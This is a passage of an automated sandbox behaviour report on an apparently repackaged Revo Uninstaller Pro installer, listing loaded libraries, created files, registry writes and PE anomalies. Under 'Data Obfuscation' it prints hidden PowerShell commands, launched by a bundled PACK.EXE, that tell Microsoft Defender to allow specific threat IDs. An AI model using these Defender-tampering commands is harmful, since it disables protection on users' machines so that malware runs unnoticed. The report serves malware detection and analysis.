Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Downloads\OperaSetup.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Downloads\OperaSetup.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: acgenral.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: msacm32.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: dbgcore.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: Revo Uninstaller Pro.lnk.0.dr | LNK file: ..\..\..\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
Source: Revo Uninstaller Pro.lnk0.0.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
Source: Uninstall Revo Uninstaller Pro.lnk.0.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\VS Revo Group\Revo Uninstaller Pro\Uninstall.exe
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | File written: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\czech.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Automated click: Next >
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Automated click: Next >
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Automated click: Install
Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | File opened: C:\Windows\SYSTEM32\RICHED32.DLL
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoAppBar.exe
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoCmd.exe
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUnPro.exe
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.sys
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Vista
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Vista\revoflt.inf
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Vista\revoflt.sys
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Win10
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Win10\revoflt.inf
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Win10\revoflt.sys
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\License.txt
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Revo Uninstaller Pro Help.pdf
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\reg_lp.bat
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\rupilogs.rupldb
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\Estonian.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\albanian.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\arabic.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\armenian.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\azerbaijani.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\bengali.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\bulgarian.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\czech.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\danish.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\dutch.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\english.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\finnish.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\french.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\german.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\gujarati.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\hebrew.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\hellenic.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\hindi.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\hrvatski.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\hungarian.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\indonesian.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\italiano.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\japanese.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\korean.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\kurdish.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\macedonian.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\norwegian.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\persian.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\polish.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\portuguese.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\portuguese_standard.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\portuguesebrazil.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\romanian.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\russian.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\serbian.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\serbianLatin.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\simplifiedchinese.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\slovak.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\slovenian.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\spanish.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\swedish.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\thai.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\traditionalchinese.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\turkish.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\ukrainian.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\vietnamese.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Uninstall.exeJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.sysJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.infJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Revo Uninstaller ProJump to behavior
      Source: Revo.Uninstaller.Pro.v5.3.4.exeStatic file information: File size 22221229 > 1048576
      Source: Revo.Uninstaller.Pro.v5.3.4.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: PACK.EXE, 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp, PACK.EXE, 00000010.00000003.2196303250.0000000004E01000.00000004.00000020.00020000.00000000.sdmp, PACK.EXE, 00000010.00000003.2194996794.00000000045FE000.00000004.00000020.00020000.00000000.sdmp, PACK.EXE, 00000010.00000000.2193337281.0000000001002000.00000002.00000001.01000000.00000012.sdmp
      Source: Binary string: C:\Work\VSRevo\Windows\Projects\VSProjectPro\build\x64\Release\VSProjectPro\VSProjectPro64.pdbU source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmp
      Source: Binary string: C:\Work\VSRevo\Windows\Projects\VSProjectPro\build\x86\Release\VSProjectPro\VSProjectPro.pdbO source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Work\VSRevo\Windows\Projects\VSProjectPro\build\x64\Release\VSProjectPro\VSProjectPro64.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmp
      Source: Binary string: C:\Work\VSRevo\Windows\Projects\RevoAppBar\x64\Release\RevoAppBar.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000005140000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Work\VSRevo\Windows\Projects\RevoAppBar\Release\RevoAppBar.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.00000000033A7000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Work\VSRevo\Windows\Projects\RevoUninProPort\Release\RevoUPPort.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: installer_lib.dll.pdb source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmp
      Source: Binary string: c:\minispy\filter\objfre_wlh_x86\i386\revoflt.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: installer_lib.dll.pdb@ source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmp
      Source: Binary string: C:\Work\VSRevo\Windows\Projects\RUExt\build\x86\Release\RUExt\RUExt.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Work\VSRevo\Windows\Projects\RevoCmd\Release\RevoCmd.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Work\VSRevo\Windows\Projects\VSProjectPro\build\x86\Release\VSProjectPro\VSProjectPro.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: c:\minispy\filter\objfre_wlh_x86\i386\revoflt.pdb2 source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Work\VSRevo\Windows\Projects\RevoCmd\x64\Release\RevoCmd.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Users\ognian\source\repos\revoflt\Release\revoflt.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force"
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147735505 -ThreatIDDefaultAction_Actions Allow -Force"
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147814523 -ThreatIDDefaultAction_Actions Allow -Force"
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_4852875
      Source: Uninstall.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x2d16e
      Source: System.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0x39be
      Source: ya.exe.16.dr | Static PE information: real checksum: 0x0 should be: 0x31f21
      Source: System.dll.26.dr | Static PE information: real checksum: 0x0 should be: 0x39be
      Source: INetC.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0x4238d
      Source: OperaSetup[1].exe.26.dr | Static PE information: real checksum: 0x2235ff should be: 0x226a34
      Source: PACK.EXE.0.dr | Static PE information: real checksum: 0x184409 should be: 0x72a2e
      Source: OperaSetup.exe.26.dr | Static PE information: real checksum: 0x2235ff should be: 0x226a34
      Source: nsExec.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0x939f
      Source: LangDLL.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0xeae7
      Source: tsjtmfdm[1].pkg.0.dr | Static PE information: real checksum: 0x184409 should be: 0x72a2e
      Source: INetC.dll.26.dr | Static PE information: real checksum: 0x0 should be: 0x4238d
      Source: nsDialogs.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0x11042
      Source: RevoAppBar.exe.0.dr | Static PE information: section name: .giats
      Source: RevoUnPro.exe.0.dr | Static PE information: section name: .giats
      Source: RevoUninPro.exe.0.dr | Static PE information: section name: .giats
      Source: ruplp.exe.0.dr | Static PE information: section name: .didata
      Source: Opera_installer_2412091654075368040.dll.28.dr | Static PE information: section name: .rodata
      Source: Opera_installer_2412091654075368040.dll.28.dr | Static PE information: section name: CPADinfo
      Source: Opera_installer_2412091654075368040.dll.28.dr | Static PE information: section name: malloc_h
      Source: Opera_installer_2412091654079011640.dll.29.dr | Static PE information: section name: .rodata
      Source: Opera_installer_2412091654079011640.dll.29.dr | Static PE information: section name: CPADinfo
      Source: Opera_installer_2412091654079011640.dll.29.dr | Static PE information: section name: malloc_h
      Source: Opera_installer_2412091654087472252.dll.30.dr | Static PE information: section name: .rodata
      Source: Opera_installer_2412091654087472252.dll.30.dr | Static PE information: section name: CPADinfo
      Source: Opera_installer_2412091654087472252.dll.30.dr | Static PE information: section name: malloc_h
      Source: Opera_installer_2412091654101308068.dll.31.dr | Static PE information: section name: .rodata
      Source: Opera_installer_2412091654101308068.dll.31.dr | Static PE information: section name: CPADinfo
      Source: Opera_installer_2412091654101308068.dll.31.dr | Static PE information: section name: malloc_h
      Source: Opera_installer_2412091654106048056.dll.32.dr | Static PE information: section name: .rodata
      Source: Opera_installer_2412091654106048056.dll.32.dr | Static PE information: section name: CPADinfo
      Source: Opera_installer_2412091654106048056.dll.32.dr | Static PE information: section name: malloc_h
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll"
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_00FEE336 push ecx; ret 16_2_00FEE349
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_00FED870 push eax; ret 16_2_00FED88E
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_048C42BD push ebx; ret 17_2_048C42DA
